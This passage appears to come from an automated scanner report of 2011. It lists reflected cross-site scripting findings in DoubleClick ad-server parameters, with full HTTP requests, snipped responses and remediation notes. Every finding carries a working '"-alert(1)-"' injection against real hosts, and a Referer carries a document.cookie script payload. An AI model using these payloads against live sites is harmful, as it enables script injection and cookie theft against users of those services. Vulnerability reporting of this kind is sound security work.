53B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9729
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... icles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951d1dd4"-alert(1)-"7f0ce352b24&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8de9"-alert(1)-"949f2676f9f was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798c8de9"-alert(1)-"949f2676f9f&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9729
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798c8de9"-alert(1)-"949f2676f9f&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3 ...[SNIP]...
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9b6a"-alert(1)-"cafab609dca was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3Fd9b6a"-alert(1)-"cafab609dca&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:33:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9723
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3Fd9b6a"-alert(1)-"cafab609dca&redirectURL=http%3a%2f%2flp2.turbotax.com/ty10/bn/geo_tx%3Fcid%3Dbn_im_nf_anb_opgeotxT_txG_pk_300x250%26priorityCode%3D4654800000"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = " ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15c43"-alert(1)-"cd748a8fe0a was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=15c43"-alert(1)-"cd748a8fe0a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4961
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 02 Feb 2011 20:27:49 GMT
Expires: Wed, 02 Feb 2011 20:27:49 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=15c43"-alert(1)-"cd748a8fe0ahttp://degrees.classesusa.com/schools/?sourceid=50545246-232704189-39897819"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW = 300; var winH = ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 138f5"-alert(1)-"eada4e3efbc was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA138f5"-alert(1)-"eada4e3efbc&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:26:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... i8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA138f5"-alert(1)-"eada4e3efbc&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819"); var wmode = "opaque"; var bg ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66758"-alert(1)-"219072ecf8b was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-453708552427379466758"-alert(1)-"219072ecf8b&adurl=;ord=699026599? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... 2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-453708552427379466758"-alert(1)-"219072ecf8b&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78291"-alert(1)-"1aa4fa9a8f0 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=178291"-alert(1)-"1aa4fa9a8f0&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... 3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=178291"-alert(1)-"1aa4fa9a8f0&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819"); var wmode = "opaque"; var bg = "";
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d3a0"-alert(1)-"cc96eba19d7 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
